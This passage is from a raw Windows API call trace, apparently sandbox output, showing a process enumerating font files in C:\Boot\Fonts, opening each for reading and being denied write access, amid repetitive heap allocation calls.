hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0083.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0083.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0083.198] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.198] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.198] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.198] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.199] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0083.199] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.199] AreFileApisANSI () returned 1 [0083.199] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\Fonts\\kor_boot.ttf", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\Fonts\\kor_boot.ttf", lpUsedDefaultChar=0x0) returned 27 [0083.199] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.199] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.199] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.199] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0083.199] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0083.199] AreFileApisANSI () returned 1 [0083.199] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0083.199] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78510 [0083.199] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x78510, cchWideChar=27 | out: lpWideCharStr="C:\\Boot\\Fonts\\kor_boot.ttf") returned 27 [0083.199] CreateFileW (lpFileName="C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0083.200] GetFileType (hFile=0x42c) returned 0x1 [0083.200] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78510 | out: hHeap=0x20000) returned 1 [0083.200] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0083.200] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0083.200] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0083.200] CloseHandle (hObject=0x42c) returned 1 [0083.201] AreFileApisANSI () returned 1 [0083.201] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0083.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x781d0 [0083.201] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x781d0, cchWideChar=27 | out: lpWideCharStr="C:\\Boot\\Fonts\\kor_boot.ttf") returned 27 [0083.201] CreateFileW (lpFileName="C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.201] GetLastError () returned 0x5 [0083.201] GetLastError () returned 0x5 [0083.201] SetLastError (dwErrCode=0x5) [0083.201] GetLastError () returned 0x5 [0083.201] SetLastError (dwErrCode=0x5) [0083.201] GetLastError () returned 0x5 [0083.201] SetLastError (dwErrCode=0x5) [0083.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x781d0 | out: hHeap=0x20000) returned 1 [0083.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0083.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0083.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.201] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.201] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.201] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4b9b37e, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef8e28b4, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x2ab6f, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="malgunn_boot.ttf", cAlternateFileName="MALGUN~1.TTF")) returned 1 [0083.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0083.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0083.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0083.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0083.202] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0083.202] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0083.202] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0083.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0083.202] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.202] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0083.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0083.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.202] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0083.202] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0083.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.202] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0083.202] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0083.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dd90 [0083.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0083.202] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.202] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dd90 | out: hHeap=0x20000) returned 1 [0083.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0083.202] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0083.202] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.202] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.202] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.202] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.202] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0083.202] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0083.202] AreFileApisANSI () returned 1 [0083.202] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\Fonts\\malgunn_boot.ttf", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\Fonts\\malgunn_boot.ttf", lpUsedDefaultChar=0x0) returned 31 [0083.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.202] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.202] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0083.203] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0083.203] AreFileApisANSI () returned 1 [0083.203] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 31 [0083.203] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3e) returned 0x53640 [0083.203] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887c0, cbMultiByte=-1, lpWideCharStr=0x53640, cchWideChar=31 | out: lpWideCharStr="C:\\Boot\\Fonts\\malgunn_boot.ttf") returned 31 [0083.203] CreateFileW (lpFileName="C:\\Boot\\Fonts\\malgunn_boot.ttf" (normalized: "c:\\boot\\fonts\\malgunn_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0083.204] GetFileType (hFile=0x42c) returned 0x1 [0083.204] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0083.204] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0083.204] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0083.204] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0083.204] CloseHandle (hObject=0x42c) returned 1 [0083.204] AreFileApisANSI () returned 1 [0083.204] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 31 [0083.204] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3e) returned 0x53640 [0083.204] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887c0, cbMultiByte=-1, lpWideCharStr=0x53640, cchWideChar=31 | out: lpWideCharStr="C:\\Boot\\Fonts\\malgunn_boot.ttf") returned 31 [0083.205] CreateFileW (lpFileName="C:\\Boot\\Fonts\\malgunn_boot.ttf" (normalized: "c:\\boot\\fonts\\malgunn_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.205] GetLastError () returned 0x5 [0083.205] GetLastError () returned 0x5 [0083.205] SetLastError (dwErrCode=0x5) [0083.205] GetLastError () returned 0x5 [0083.205] SetLastError (dwErrCode=0x5) [0083.205] GetLastError () returned 0x5 [0083.205] SetLastError (dwErrCode=0x5) [0083.205] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0083.205] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0083.205] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0083.205] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.205] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.205] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.205] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4b9b37e, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef8f4db4, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x2b506, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="malgun_boot.ttf", cAlternateFileName="MALGUN~2.TTF")) returned 1 [0083.205] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.205] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.205] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.205] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.205] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.205] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.205] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.205] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.205] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0083.205] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.205] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0083.205] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.205] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0083.205] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.205] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0083.205] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.206] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.206] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.206] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.206] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0083.206] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.206] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.206] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0083.206] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0083.206] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.206] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.206] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.206] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.206] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0083.206] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.206] AreFileApisANSI () returned 1 [0083.206] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\Fonts\\malgun_boot.ttf", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\Fonts\\malgun_boot.ttf", lpUsedDefaultChar=0x0) returned 30 [0083.206] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.206] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.206] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.206] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0083.206] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0083.206] AreFileApisANSI () returned 1 [0083.206] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0083.206] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53640 [0083.206] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x53640, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\Fonts\\malgun_boot.ttf") returned 30 [0083.206] CreateFileW (lpFileName="C:\\Boot\\Fonts\\malgun_boot.ttf" (normalized: "c:\\boot\\fonts\\malgun_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0083.207] GetFileType (hFile=0x42c) returned 0x1 [0083.207] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0083.207] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0083.207] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0083.208] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0083.208] CloseHandle (hObject=0x42c) returned 1 [0083.208] AreFileApisANSI () returned 1 [0083.208] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0083.208] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x533b8 [0083.208] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x533b8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\Fonts\\malgun_boot.ttf") returned 30 [0083.208] CreateFileW (lpFileName="C:\\Boot\\Fonts\\malgun_boot.ttf" (normalized: "c:\\boot\\fonts\\malgun_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.208] GetLastError () returned 0x5 [0083.208] GetLastError () returned 0x5 [0083.208] SetLastError (dwErrCode=0x5) [0083.208] GetLastError () returned 0x5 [0083.208] SetLastError (dwErrCode=0x5) [0083.208] GetLastError () returned 0x5 [0083.208] SetLastError (dwErrCode=0x5) [0083.208] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0083.208] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0083.208] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0083.209] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.209] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.209] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.209] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4b9b37e, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef9072c7, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x2318a, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="meiryon_boot.ttf", cAlternateFileName="MEIRYO~1.TTF")) returned 1 [0083.209] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0083.209] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0083.209] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0083.209] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0083.209] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0083.209] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0083.209] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0083.209] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0083.209] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0083.209] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0083.209] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0083.209] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.209] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0083.209] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.209] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0083.209] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.209] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0083.209] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.209] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0083.209] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.209] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0083.209] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0083.209] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.209] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0083.209] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0083.209] 